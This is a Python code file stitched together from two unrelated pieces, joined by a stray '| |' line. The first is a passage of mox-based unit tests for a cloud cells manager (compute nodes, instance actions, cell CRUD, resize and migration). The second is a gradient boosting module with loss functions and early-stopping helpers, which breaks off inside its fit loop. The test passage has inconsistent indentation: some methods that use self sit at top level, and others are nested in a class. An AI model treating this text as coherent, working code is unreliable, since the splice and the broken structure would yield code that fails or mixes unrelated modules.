    self.assertEqual(expected_response, response)
def test_compute_node_get_all(self):
    """Per-cell compute node lists are flattened into one proxy list, sorted by cell."""
    responses = []
    expected_response = []
    # 3 cells... so 3 responses.  Each response is a list of computes.
    # Manager should turn these into a single list of responses.
    for i in range(3):
        cell_name = 'path!to!cell%i' % i
        compute_nodes = []
        for compute_node in FAKE_COMPUTE_NODES:
            fake_compute = objects.ComputeNode(**compute_node)
            # Avoid lazy-loading the service relation during the test.
            fake_compute._cached_service = None
            compute_nodes.append(fake_compute)
            expected_compute_node = cells_utils.ComputeNodeProxy(
                fake_compute, cell_name)
            expected_response.append(
                (cell_name, expected_compute_node, fake_compute))
        response = messaging.Response(self.ctxt, cell_name, compute_nodes,
                                      False)
        responses.append(response)
    self.mox.StubOutWithMock(self.msg_runner,
                             'compute_node_get_all')
    self.mox.StubOutWithMock(cells_utils, 'add_cell_to_compute_node')
    self.msg_runner.compute_node_get_all(self.ctxt,
            hypervisor_match='fake-match').AndReturn(responses)
    # Calls are done by cells, so we need to sort the list by the cell name
    expected_response.sort(key=lambda k: k[0])
    for cell_name, compute_proxy, compute_node in expected_response:
        cells_utils.add_cell_to_compute_node(
            compute_node, cell_name).AndReturn(compute_proxy)
    self.mox.ReplayAll()
    response = self.cells_manager.compute_node_get_all(self.ctxt,
            hypervisor_match='fake-match')
    self.assertEqual([proxy for cell, proxy, compute in expected_response],
                     response)
def test_compute_node_stats(self):
    """Per-cell stat dicts are merged with values summed per key."""
    raw_resp1 = {'key1': 1, 'key2': 2}
    raw_resp2 = {'key2': 1, 'key3': 2}
    raw_resp3 = {'key3': 1, 'key4': 2}
    responses = [messaging.Response(self.ctxt, 'cell1', raw_resp1, False),
                 messaging.Response(self.ctxt, 'cell2', raw_resp2, False),
                 messaging.Response(self.ctxt, 'cell2', raw_resp3, False)]
    expected_resp = {'key1': 1, 'key2': 3, 'key3': 3, 'key4': 2}

    self.mox.StubOutWithMock(self.msg_runner,
                             'compute_node_stats')
    self.msg_runner.compute_node_stats(self.ctxt).AndReturn(responses)
    self.mox.ReplayAll()

    response = self.cells_manager.compute_node_stats(self.ctxt)
    self.assertEqual(expected_resp, response)
def test_compute_node_get(self):
    """compute_node_get routes by cell!id and wraps the node in a proxy."""
    fake_cell = 'fake-cell'
    fake_compute = objects.ComputeNode(**FAKE_COMPUTE_NODES[0])
    # Avoid lazy-loading the service relation during the test.
    fake_compute._cached_service = None
    fake_response = messaging.Response(self.ctxt, fake_cell,
                                       fake_compute,
                                       False)
    expected_response = cells_utils.ComputeNodeProxy(fake_compute,
                                                     fake_cell)
    cell_and_id = cells_utils.cell_with_item(fake_cell, 'fake-id')

    self.mox.StubOutWithMock(self.msg_runner,
                             'compute_node_get')
    self.mox.StubOutWithMock(cells_utils, 'add_cell_to_compute_node')

    self.msg_runner.compute_node_get(self.ctxt,
            'fake-cell', 'fake-id').AndReturn(fake_response)
    cells_utils.add_cell_to_compute_node(
        fake_compute, fake_cell).AndReturn(expected_response)
    self.mox.ReplayAll()

    response = self.cells_manager.compute_node_get(self.ctxt,
            compute_id=cell_and_id)
    self.assertEqual(expected_response, response)
def test_actions_get(self):
    """actions_get forwards cell and instance uuid and unwraps the action list."""
    fake_uuid = fake_server_actions.FAKE_UUID
    fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
    fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
    fake_response = messaging.Response(self.ctxt, 'fake-cell', [fake_act],
                                       False)
    expected_response = [fake_act]
    self.mox.StubOutWithMock(self.msg_runner, 'actions_get')
    self.msg_runner.actions_get(self.ctxt, 'fake-cell',
                                'fake-uuid').AndReturn(fake_response)
    self.mox.ReplayAll()
    response = self.cells_manager.actions_get(self.ctxt, 'fake-cell',
                                              'fake-uuid')
    self.assertEqual(expected_response, response)
    def test_action_get_by_request_id(self):
        """action_get_by_request_id unwraps a single action from the response."""
        fake_uuid = fake_server_actions.FAKE_UUID
        fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
        fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
        fake_response = messaging.Response(self.ctxt, 'fake-cell', fake_act,
                                           False)
        expected_response = fake_act
        self.mox.StubOutWithMock(self.msg_runner, 'action_get_by_request_id')
        self.msg_runner.action_get_by_request_id(self.ctxt, 'fake-cell',
                'fake-uuid', 'req-fake').AndReturn(fake_response)
        self.mox.ReplayAll()
        response = self.cells_manager.action_get_by_request_id(self.ctxt,
                                                               'fake-cell',
                                                               'fake-uuid',
                                                               'req-fake')
        self.assertEqual(expected_response, response)
    def test_action_events_get(self):
        """action_events_get unwraps the event list from the cell response."""
        fake_action_id = fake_server_actions.FAKE_ACTION_ID1
        fake_events = fake_server_actions.FAKE_EVENTS[fake_action_id]
        fake_response = messaging.Response(self.ctxt, 'fake-cell', fake_events,
                                           False)
        expected_response = fake_events
        self.mox.StubOutWithMock(self.msg_runner, 'action_events_get')
        self.msg_runner.action_events_get(self.ctxt, 'fake-cell',
                                          'fake-action').AndReturn(fake_response)
        self.mox.ReplayAll()
        response = self.cells_manager.action_events_get(self.ctxt, 'fake-cell',
                                                        'fake-action')
        self.assertEqual(expected_response, response)
    def test_consoleauth_delete_tokens(self):
        """consoleauth_delete_tokens is a fire-and-forget pass-through."""
        instance_uuid = 'fake-instance-uuid'
        self.mox.StubOutWithMock(self.msg_runner,
                                 'consoleauth_delete_tokens')
        self.msg_runner.consoleauth_delete_tokens(self.ctxt, instance_uuid)
        self.mox.ReplayAll()
        self.cells_manager.consoleauth_delete_tokens(self.ctxt,
                                                     instance_uuid=instance_uuid)
    def test_get_capacities(self):
        """get_capacities queries the state manager, not the message runner."""
        cell_name = 'cell_name'
        response = {"ram_free":
                        {"units_by_mb": {"64": 20, "128": 10}, "total_mb": 1491}}
        self.mox.StubOutWithMock(self.state_manager,
                                 'get_capacities')
        self.state_manager.get_capacities(cell_name).AndReturn(response)
        self.mox.ReplayAll()
        self.assertEqual(response,
                         self.cells_manager.get_capacities(self.ctxt, cell_name))
    def test_validate_console_port(self):
        """validate_console_port looks up the instance's cell from the DB
        before routing the validation to that cell."""
        instance_uuid = 'fake-instance-uuid'
        cell_name = 'fake-cell-name'
        instance = {'cell_name': cell_name}
        console_port = 'fake-console-port'
        console_type = 'fake-console-type'
        self.mox.StubOutWithMock(self.msg_runner,
                                 'validate_console_port')
        self.mox.StubOutWithMock(self.cells_manager.db,
                                 'instance_get_by_uuid')
        fake_response = self._get_fake_response()
        self.cells_manager.db.instance_get_by_uuid(self.ctxt,
                instance_uuid).AndReturn(instance)
        self.msg_runner.validate_console_port(self.ctxt, cell_name,
                instance_uuid, console_port,
                console_type).AndReturn(fake_response)
        self.mox.ReplayAll()
        response = self.cells_manager.validate_console_port(self.ctxt,
                instance_uuid=instance_uuid, console_port=console_port,
                console_type=console_type)
        self.assertEqual('fake-response', response)
    def test_bdm_update_or_create_at_top(self):
        """bdm_update_or_create_at_top forwards args to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner,
                                 'bdm_update_or_create_at_top')
        self.msg_runner.bdm_update_or_create_at_top(self.ctxt,
                                                    'fake-bdm',
                                                    create='foo')
        self.mox.ReplayAll()
        self.cells_manager.bdm_update_or_create_at_top(self.ctxt,
                                                       'fake-bdm',
                                                       create='foo')
    def test_bdm_destroy_at_top(self):
        """bdm_destroy_at_top forwards device_name/volume_id unchanged."""
        self.mox.StubOutWithMock(self.msg_runner, 'bdm_destroy_at_top')
        self.msg_runner.bdm_destroy_at_top(self.ctxt,
                                           'fake_instance_uuid',
                                           device_name='fake_device_name',
                                           volume_id='fake_volume_id')
        self.mox.ReplayAll()
        self.cells_manager.bdm_destroy_at_top(self.ctxt,
                                              'fake_instance_uuid',
                                              device_name='fake_device_name',
                                              volume_id='fake_volume_id')
    def test_get_migrations(self):
        """With no cell filter, migrations from all cells are concatenated."""
        filters = {'status': 'confirmed'}
        cell1_migrations = [{'id': 123}]
        cell2_migrations = [{'id': 456}]
        fake_responses = [self._get_fake_response(cell1_migrations),
                          self._get_fake_response(cell2_migrations)]
        self.mox.StubOutWithMock(self.msg_runner,
                                 'get_migrations')
        self.msg_runner.get_migrations(self.ctxt, None, False, filters).\
            AndReturn(fake_responses)
        self.mox.ReplayAll()
        response = self.cells_manager.get_migrations(self.ctxt, filters)
        self.assertEqual([cell1_migrations[0], cell2_migrations[0]], response)
    def test_get_migrations_for_a_given_cell(self):
        """A 'cell_name' filter targets '<our cell>!<child cell>' only."""
        filters = {'status': 'confirmed', 'cell_name': 'ChildCell1'}
        target_cell = '%s%s%s' % (CONF.cells.name, '!', filters['cell_name'])
        migrations = [{'id': 123}]
        fake_responses = [self._get_fake_response(migrations)]
        self.mox.StubOutWithMock(self.msg_runner,
                                 'get_migrations')
        self.msg_runner.get_migrations(self.ctxt, target_cell, False,
                                       filters).AndReturn(fake_responses)
        self.mox.ReplayAll()
        response = self.cells_manager.get_migrations(self.ctxt, filters)
        self.assertEqual(migrations, response)
    def test_instance_update_from_api(self):
        """instance_update_from_api passes expected states positionally."""
        self.mox.StubOutWithMock(self.msg_runner,
                                 'instance_update_from_api')
        self.msg_runner.instance_update_from_api(self.ctxt,
                                                 'fake-instance',
                                                 'exp_vm', 'exp_task',
                                                 'admin_reset')
        self.mox.ReplayAll()
        self.cells_manager.instance_update_from_api(
                self.ctxt, instance='fake-instance',
                expected_vm_state='exp_vm',
                expected_task_state='exp_task',
                admin_state_reset='admin_reset')
    def test_start_instance(self):
        """start_instance is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'start_instance')
        self.msg_runner.start_instance(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.start_instance(self.ctxt, instance='fake-instance')
    def test_stop_instance(self):
        """stop_instance forwards do_cast and clean_shutdown untouched."""
        self.mox.StubOutWithMock(self.msg_runner, 'stop_instance')
        self.msg_runner.stop_instance(self.ctxt, 'fake-instance',
                                      do_cast='meow',
                                      clean_shutdown='purr')
        self.mox.ReplayAll()
        self.cells_manager.stop_instance(self.ctxt,
                                         instance='fake-instance',
                                         do_cast='meow',
                                         clean_shutdown='purr')
    def test_cell_create(self):
        """cell_create delegates to the state manager and returns its result."""
        values = 'values'
        response = 'created_cell'
        self.mox.StubOutWithMock(self.state_manager,
                                 'cell_create')
        self.state_manager.cell_create(self.ctxt, values).\
            AndReturn(response)
        self.mox.ReplayAll()
        self.assertEqual(response,
                         self.cells_manager.cell_create(self.ctxt, values))
    def test_cell_update(self):
        """cell_update delegates to the state manager and returns its result."""
        cell_name = 'cell_name'
        values = 'values'
        response = 'updated_cell'
        self.mox.StubOutWithMock(self.state_manager,
                                 'cell_update')
        self.state_manager.cell_update(self.ctxt, cell_name, values).\
            AndReturn(response)
        self.mox.ReplayAll()
        self.assertEqual(response,
                         self.cells_manager.cell_update(self.ctxt, cell_name,
                                                        values))
    def test_cell_delete(self):
        """cell_delete delegates to the state manager; returns rows deleted."""
        cell_name = 'cell_name'
        response = 1
        self.mox.StubOutWithMock(self.state_manager,
                                 'cell_delete')
        self.state_manager.cell_delete(self.ctxt, cell_name).\
            AndReturn(response)
        self.mox.ReplayAll()
        self.assertEqual(response,
                         self.cells_manager.cell_delete(self.ctxt, cell_name))
    def test_cell_get(self):
        """cell_get delegates to the state manager and returns its result."""
        cell_name = 'cell_name'
        response = 'cell_info'
        self.mox.StubOutWithMock(self.state_manager,
                                 'cell_get')
        self.state_manager.cell_get(self.ctxt, cell_name).\
            AndReturn(response)
        self.mox.ReplayAll()
        self.assertEqual(response,
                         self.cells_manager.cell_get(self.ctxt, cell_name))
    def test_reboot_instance(self):
        """reboot_instance forwards the reboot type positionally."""
        self.mox.StubOutWithMock(self.msg_runner, 'reboot_instance')
        self.msg_runner.reboot_instance(self.ctxt, 'fake-instance',
                                        'HARD')
        self.mox.ReplayAll()
        self.cells_manager.reboot_instance(self.ctxt,
                                           instance='fake-instance',
                                           reboot_type='HARD')
    def test_suspend_instance(self):
        """suspend_instance is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'suspend_instance')
        self.msg_runner.suspend_instance(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.suspend_instance(self.ctxt,
                                            instance='fake-instance')
    def test_resume_instance(self):
        """resume_instance is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'resume_instance')
        self.msg_runner.resume_instance(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.resume_instance(self.ctxt,
                                           instance='fake-instance')
    def test_terminate_instance(self):
        """terminate_instance is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'terminate_instance')
        self.msg_runner.terminate_instance(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.terminate_instance(self.ctxt,
                                              instance='fake-instance')
    def test_soft_delete_instance(self):
        """soft_delete_instance is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'soft_delete_instance')
        self.msg_runner.soft_delete_instance(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.soft_delete_instance(self.ctxt,
                                                instance='fake-instance')
    def _test_resize_instance(self, clean_shutdown=True):
        """Shared body for the resize tests; parameterized on clean_shutdown."""
        self.mox.StubOutWithMock(self.msg_runner, 'resize_instance')
        self.msg_runner.resize_instance(self.ctxt, 'fake-instance',
                                        'fake-flavor', 'fake-updates',
                                        clean_shutdown=clean_shutdown)
        self.mox.ReplayAll()
        self.cells_manager.resize_instance(
            self.ctxt, instance='fake-instance', flavor='fake-flavor',
            extra_instance_updates='fake-updates',
            clean_shutdown=clean_shutdown)
    def test_resize_instance(self):
        # Default path: clean shutdown requested.
        self._test_resize_instance()
    def test_resize_instance_forced_shutdown(self):
        # Forced path: clean_shutdown=False must be forwarded verbatim.
        self._test_resize_instance(clean_shutdown=False)
    def test_live_migrate_instance(self):
        """live_migrate_instance forwards migration options positionally."""
        self.mox.StubOutWithMock(self.msg_runner, 'live_migrate_instance')
        self.msg_runner.live_migrate_instance(self.ctxt, 'fake-instance',
                                              'fake-block', 'fake-commit',
                                              'fake-host')
        self.mox.ReplayAll()
        self.cells_manager.live_migrate_instance(
            self.ctxt, instance='fake-instance',
            block_migration='fake-block', disk_over_commit='fake-commit',
            host_name='fake-host')
    def test_revert_resize(self):
        """revert_resize is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'revert_resize')
        self.msg_runner.revert_resize(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.revert_resize(self.ctxt, instance='fake-instance')
    def test_confirm_resize(self):
        """confirm_resize is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'confirm_resize')
        self.msg_runner.confirm_resize(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.confirm_resize(self.ctxt, instance='fake-instance')
    def test_reset_network(self):
        """reset_network is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'reset_network')
        self.msg_runner.reset_network(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.reset_network(self.ctxt, instance='fake-instance')
    def test_inject_network_info(self):
        """inject_network_info is a plain pass-through to the message runner."""
        self.mox.StubOutWithMock(self.msg_runner, 'inject_network_info')
        self.msg_runner.inject_network_info(self.ctxt, 'fake-instance')
        self.mox.ReplayAll()
        self.cells_manager.inject_network_info(self.ctxt,
                                               instance='fake-instance')
    def test_snapshot_instance(self):
        """snapshot_instance forwards the image id positionally."""
        self.mox.StubOutWithMock(self.msg_runner, 'snapshot_instance')
        self.msg_runner.snapshot_instance(self.ctxt, 'fake-instance',
                                          'fake-id')
        self.mox.ReplayAll()
        self.cells_manager.snapshot_instance(self.ctxt,
                                             instance='fake-instance',
                                             image_id='fake-id')
    def test_backup_instance(self):
        """backup_instance forwards image id, backup type and rotation."""
        self.mox.StubOutWithMock(self.msg_runner, 'backup_instance')
        self.msg_runner.backup_instance(self.ctxt, 'fake-instance',
                                        'fake-id', 'backup-type',
                                        'rotation')
        self.mox.ReplayAll()
        self.cells_manager.backup_instance(self.ctxt,
                                           instance='fake-instance',
                                           image_id='fake-id',
                                           backup_type='backup-type',
                                           rotation='rotation')
    def test_set_admin_password(self):
        """set_admin_password passes instance and password through; this one
        uses mock.patch rather than mox like the rest of the class."""
        with mock.patch.object(self.msg_runner,
                               'set_admin_password') as set_admin_password:
            self.cells_manager.set_admin_password(self.ctxt,
                    instance='fake-instance', new_pass='fake-password')
            set_admin_password.assert_called_once_with(self.ctxt,
                    'fake-instance', 'fake-password')
| |
from .sklearntools import fit_predict, shrinkd, LinearCombination, BaseDelegatingEstimator, \
STSimpleEstimator, AlreadyFittedEstimator, growd
from sklearn.base import clone
from toolz.dicttoolz import valmap, dissoc
from .line_search import golden_section_search, zoom_search, zoom
import numpy as np
from sklearn.ensemble.gradient_boosting import RegressionLossFunction,\
QuantileEstimator, QuantileLossFunction, ExponentialLoss,\
ScaledLogOddsEstimator
from operator import __sub__, __lt__
from toolz.itertoolz import sliding_window
from itertools import starmap
from toolz.functoolz import flip, curry
from sklearn.exceptions import NotFittedError
from .sym.sym_predict import sym_predict
from .sym.sym_score_to_decision import sym_score_to_decision
from .sym.syms import syms
from .sym.sym_score_to_proba import sym_score_to_proba
from distutils.version import LooseVersion
import sklearn
from types import MethodType
from sklearn.linear_model.base import LinearRegression
from scipy.optimize.linesearch import line_search
import traceback
# Patch over bug in scikit learn (issue #9539)
if LooseVersion(sklearn.__version__) <= LooseVersion('0.18.2'):
    def __call__(self, y, pred, sample_weight=None):
        """Corrected quantile (pinball) loss, replacing the buggy upstream
        implementation for old scikit-learn versions."""
        pred = pred.ravel()
        diff = y - pred
        alpha = self.alpha
        mask = y > pred
        if sample_weight is None:
            loss = (alpha * diff[mask].sum() -
                    (1.0 - alpha) * diff[~mask].sum()) / y.shape[0]
        else:
            loss = ((alpha * np.sum(sample_weight[mask] * diff[mask]) -
                     (1.0 - alpha) * np.sum(sample_weight[~mask] * diff[~mask])) /
                    sample_weight.sum())
        return loss
    # BUG FIX: MethodType(func, None, cls) is Python-2-only; under Python 3 it
    # raises TypeError at import time.  Mirror the guard already used for the
    # ExponentialLoss patch below: fall back to plain function assignment,
    # which yields identical bound-method behavior on Python 3.
    try:
        QuantileLossFunction.__call__ = MethodType(__call__, None, QuantileLossFunction)
    except TypeError:
        QuantileLossFunction.__call__ = __call__
if LooseVersion(sklearn.__version__) <= LooseVersion('0.19.1'):
    # (An earlier __call__ patch for ExponentialLoss was abandoned; only the
    # gradient is corrected here.)
    def negative_gradient(self, y, pred, **kargs):
        """Corrected negative gradient of the exponential loss: map y in
        {0, 1} to y_ in {-1, +1}, then differentiate exp(y_ * pred)."""
        y_ = -(2. * y - 1.)
        return - y_ * np.exp(y_ * pred.ravel())
    try:
        # Python 2: install as an unbound method on the class.
        ExponentialLoss.negative_gradient = MethodType(negative_gradient, None, ExponentialLoss)
    except TypeError:
        # Python 3: MethodType no longer takes (func, None, cls); plain
        # function assignment gives the same bound-method behavior.
        ExponentialLoss.negative_gradient = negative_gradient
def log_one_plus_exp_x(x):
    """Numerically stable elementwise log(1 + exp(x)) (softplus).

    For x < -10, exp(x) is tiny and log(1 + exp(x)) ~= exp(x); for x > 35,
    exp(x) dominates and the result is just x; in between the direct formula
    is evaluated.  Uses np.log1p (instead of np.log(1 + ...)) in the middle
    band to avoid precision loss when exp(x) is small.

    :param x: numpy array of floats.
    :return: array of the same shape as ``x``.
    """
    lower = -10.
    upper = 35.
    result = np.zeros_like(x)
    low_idx = x < lower
    result[low_idx] = np.exp(x[low_idx])
    high_idx = x > upper
    result[high_idx] = x[high_idx]
    middle_idx = ~(low_idx | high_idx)
    result[middle_idx] = np.log1p(np.exp(x[middle_idx]))
    return result
def one_over_one_plus_exp_x(x):
    """Numerically stable elementwise 1 / (1 + exp(x)), i.e. sigmoid(-x).

    Saturates to 1 below -100 and to 0 above +100 so np.exp never overflows.
    """
    saturate_low = x < -100.
    saturate_high = x > 100.
    interior = ~(saturate_low | saturate_high)
    out = np.zeros_like(x)
    out[saturate_low] = 1.
    out[saturate_high] = 0.
    out[interior] = 1. / (1. + np.exp(x[interior]))
    return out
class STExponentialLossFunction(object):
    """Exponential loss for labels y in {-1, +1}.

    __call__ returns the elementwise loss exp(-y * pred) when no sample
    weights are given, and the weighted sum otherwise.
    """
    def init_estimator(self):
        """Initial estimator producing scaled log-odds scores."""
        return ScaledLogOddsEstimator()

    def __call__(self, y, pred, sample_weight=None):
        # BUG FIX: removed leftover debug print(y)/print(pred) calls that
        # spammed stdout on every loss evaluation.
        pred = pred.ravel()
        if sample_weight is None:
            return np.exp(- y * pred)
        else:
            return np.sum(sample_weight * np.exp(- y * pred))

    def negative_gradient(self, y, pred, sample_weight=None, **kargs):
        """Negative gradient -y * exp(-y * pred), optionally sample-weighted."""
        result = - y * np.exp(- y * pred.ravel())
        if sample_weight is not None:
            return sample_weight * result
        return result
class SmoothQuantileLossFunction(RegressionLossFunction):
    """Smooth (softplus-based) approximation of the quantile loss.

    ``tau`` is the target quantile; ``alpha`` controls the smoothing — as
    alpha -> 0 the loss approaches the exact pinball loss.
    """
    def __init__(self, n_classes, tau, alpha):
        super(SmoothQuantileLossFunction, self).__init__(n_classes)
        self.tau = tau
        self.alpha = alpha

    def init_estimator(self):
        """Constant initial estimator at the tau-th quantile of y."""
        return QuantileEstimator(self.tau)

    def __call__(self, y, pred, sample_weight=None):
        """Total (optionally weighted) smoothed quantile loss."""
        residual = y - pred
        pointwise = self.tau * residual + self.alpha * log_one_plus_exp_x(-(1. / self.alpha) * residual)
        if sample_weight is None:
            return np.sum(pointwise)
        return np.dot(sample_weight, pointwise)

    def negative_gradient(self, y, pred, sample_weight=None):
        """Elementwise negative gradient of the smoothed loss."""
        residual = y - pred
        grad = self.tau - one_over_one_plus_exp_x((1. / self.alpha) * residual)
        if sample_weight is None:
            return grad
        return sample_weight * grad

    def _update_terminal_region(self, *args, **kwargs):
        # Tree-specific leaf updates are not supported for this loss.
        raise NotImplementedError()
def never_stop_early(**kwargs):
    """Stopping condition that never fires: boosting runs all iterations."""
    return False
class NIterationsWithoutImprovementOverThreshold(object):
    """Early-stopping predicate: fire once ``n`` consecutive iterations fail
    to improve by more than ``threshold`` as measured by ``stat``.

    ``stat(before, after)`` scores the change between consecutive losses; the
    predicate is true when every one of the last ``n`` changes is greater
    than ``-threshold`` (i.e. no sufficiently large improvement occurred).
    """
    def __init__(self, stat, n, threshold=0.):
        self.stat = stat
        self.n = n
        self.threshold = threshold

    def __call__(self, losses, **kwargs):
        if len(losses) <= self.n:
            return False
        window = losses[-(self.n + 1):]
        changes = [self.stat(before, after)
                   for before, after in zip(window, window[1:])]
        return all(-self.threshold < change for change in changes)
@curry
def stop_after_n_iterations_without_stat_improvement_over_threshold(stat, n, threshold=0.):
    """Build a stopping condition from an improvement statistic.

    ``curry`` lets callers pre-bind just ``stat`` (see the module-level
    stoppers below) and supply ``n``/``threshold`` later.
    """
    return NIterationsWithoutImprovementOverThreshold(stat, n, threshold)
# def _stop_after_n_iterations_without_improvement(losses, **kwargs):
# if len(losses) <= n:
# return False
# return all(map(curry(__lt__)(-threshold), starmap(stat, sliding_window(2, losses[-(n+1):]))))
# return _stop_after_n_iterations_without_improvement
def reduction(before, after):
    """Absolute change from ``before`` to ``after`` (positive = increase)."""
    delta = after - before
    return delta
# Stopper factory using the raw change (after - before) as the statistic.
stop_after_n_iterations_without_improvement_over_threshold = stop_after_n_iterations_without_stat_improvement_over_threshold(flip(__sub__))
def percent_reduction(before, after):
    """Change from ``before`` to ``after`` as a percentage of ``before``."""
    delta = after - before
    return 100 * delta / float(before)
# Stopper factory using the percentage change as the statistic.
stop_after_n_iterations_without_percent_improvement_over_threshold = stop_after_n_iterations_without_stat_improvement_over_threshold(percent_reduction)
# class GradientDescentRegressor(STSimpleEstimator):
# def __init__(self, loss_function, initial_value=0.):
# self.loss_function = loss_function
#
# def fit(self, X, y, sample_weight=None):
# intercept = self.initial_value
# coef = np.zeros(X.shape[1])
# prediction = intercept + np.dot(X, coef)
# gradient_args = {'y':y, 'pred':prediction}
# while True:
# gradient = self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args))
# linear_model = LinearRegression().fit(X, gradient)
# approx_gradient = linear_model.predict(X)
#
class GradientBoostingEstimator(BaseDelegatingEstimator):
    """Gradient boosting over an arbitrary scikit-learn style base estimator.

    Each stage fits a clone of ``base_estimator`` to the negative gradient of
    ``loss_function`` and chooses a step size by golden-section line search
    (scaled by ``learning_rate``).  The fitted model is the linear combination
    of all stage estimators.

    :param base_estimator: estimator fitted to the pseudo-residuals each stage.
    :param loss_function: loss object providing ``__call__``,
        ``negative_gradient`` and ``init_estimator``.
    :param learning_rate: multiplier applied to every line-search step.
    :param n_estimators: maximum number of boosting stages.
    :param stopper: early-stopping predicate (receives iteration, losses, ...).
    :param verbose: >= 1 prints per-iteration progress.
    :param extra_fit: if True, run a secondary linear boosting pass on each
        stage's transformed features instead of a plain line-search step.
    """
    def __init__(self, base_estimator, loss_function, learning_rate=.1, n_estimators=100,
                 stopper=never_stop_early, verbose=0, extra_fit=False):
        self.base_estimator = base_estimator
        self.loss_function = loss_function
        self.learning_rate = learning_rate
        self.n_estimators = n_estimators
        self.stopper = stopper
        self.verbose = verbose
        self.extra_fit = extra_fit

    def fit(self, X, y, sample_weight=None, exposure=None, previous_prediction=None):
        """Fit the boosted ensemble.

        ``previous_prediction`` warm-starts the score instead of fitting the
        loss function's initial estimator.
        """
        fit_args = {'X': growd(2, X), 'y': shrinkd(1, y)}
        if sample_weight is not None:
            fit_args['sample_weight'] = shrinkd(1, sample_weight)
        if exposure is not None:
            fit_args['exposure'] = shrinkd(1, exposure)
        if self._estimator_type == 'classifier':
            self.classes_, y = np.unique(growd(2, y), return_inverse=True)
        else:
            self.y = growd(2, y)
        coefficients = []
        estimators = []
        if previous_prediction is None:
            initial_estimator = self.loss_function.init_estimator()
            initial_estimator.fit(**fit_args)
            coefficients.append(1.)
            estimators.append(initial_estimator)
        predict_args = {'X': X}
        if exposure is not None:
            predict_args['exposure'] = exposure
        if previous_prediction is None:
            prediction = shrinkd(1, initial_estimator.predict(**valmap(shrinkd(1), predict_args)))
        else:
            prediction = previous_prediction.copy()
        gradient_args = {'y': y, 'pred': prediction}
        # BUG FIX: these two lines previously read
        # ``gradient_args['sample_weight': sample_weight]`` — a slice lookup
        # that raises TypeError at runtime — instead of dict assignments.
        if sample_weight is not None:
            gradient_args['sample_weight'] = sample_weight
        if exposure is not None:
            gradient_args['exposure'] = exposure
        gradient = shrinkd(1, self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args)))
        partial_arguments = {'y': y}
        if sample_weight is not None:
            partial_arguments['sample_weight'] = sample_weight
        if exposure is not None:
            partial_arguments['exposure'] = exposure
        loss_function = lambda pred: self.loss_function(pred=shrinkd(1, pred), **valmap(shrinkd(1), partial_arguments))
        self.initial_loss_ = loss_function(prediction)
        loss = self.initial_loss_
        losses = [self.initial_loss_]
        predict_args = {'X': X}
        if exposure is not None:
            predict_args['exposure'] = shrinkd(1, exposure)
        self.early_stop_ = False
        for iteration in range(self.n_estimators):
            previous_loss = loss
            if self.verbose >= 1:
                print('Fitting estimator %d...' % (iteration + 1))
            fit_args['y'] = shrinkd(1, gradient)
            estimator = clone(self.base_estimator)
            # (A redundant try/except that only re-raised was removed here.)
            approx_gradient = shrinkd(1, fit_predict(estimator, **fit_args))
            if self.verbose >= 1:
                print('Fitting for estimator %d complete.' % (iteration + 1))
            if self.extra_fit:
                # Boost a linear model on the stage's transformed features and
                # fold the pair into a single composed stage estimator.
                transform_args = {'X': X}
                if exposure is not None:
                    transform_args['exposure'] = exposure
                extra_fit_args = {'X': estimator.transform(**transform_args), 'y': y, 'previous_prediction': prediction}
                if sample_weight is not None:
                    extra_fit_args['sample_weight'] = sample_weight
                extra_predict_args = dissoc(extra_fit_args, 'y', 'previous_prediction')
                extra_estimator = GradientBoostingEstimator(LinearRegression(), loss_function=self.loss_function,
                                                            stopper=stop_after_n_iterations_without_percent_improvement_over_threshold(1, .001))
                extra_estimator.fit(**valmap(shrinkd(1), extra_fit_args))
                prediction += extra_estimator.decision_function(**extra_predict_args)
                loss = loss_function(prediction)
                coefficients.append(1.)
                estimators.append((AlreadyFittedEstimator(estimator) >> AlreadyFittedEstimator(extra_estimator)).fit(X, y))
                losses.append(loss)
            else:
                if self.verbose >= 1:
                    print('Computing alpha for estimator %d...' % (iteration + 1))
                # Golden-section line search along the fitted gradient direction.
                alpha = zoom_search(golden_section_search(1e-16), zoom(1., 20, 2.), loss_function, prediction, approx_gradient)
                alpha *= self.learning_rate
                if self.verbose >= 1:
                    print('alpha = %f' % alpha)
                    print('Computing alpha for estimator %d complete.' % (iteration + 1))
                prediction += alpha * approx_gradient
                loss = loss_function(prediction)
                coefficients.append(alpha)
                estimators.append(estimator)
                losses.append(loss)
            if self.verbose >= 1:
                print('Loss after %d iterations is %f, a reduction of %f%%.' % (iteration + 1, loss, 100 * (previous_loss - loss) / float(previous_loss)))
                # BUG FIX: this progress line was previously printed
                # unconditionally; it now respects ``verbose`` like the rest.
                print('Checking early stopping condition for estimator %d...' % (iteration + 1))
            if self.stopper(iteration=iteration, coefficients=coefficients, losses=losses,
                            gradient=gradient, approx_gradient=approx_gradient):
                self.early_stop_ = True
                if self.verbose >= 1:
                    print('Stopping early after %d iterations.' % (iteration + 1))
                break
            if self.verbose >= 1:
                print('Not stopping early.')
            gradient_args['pred'] = prediction
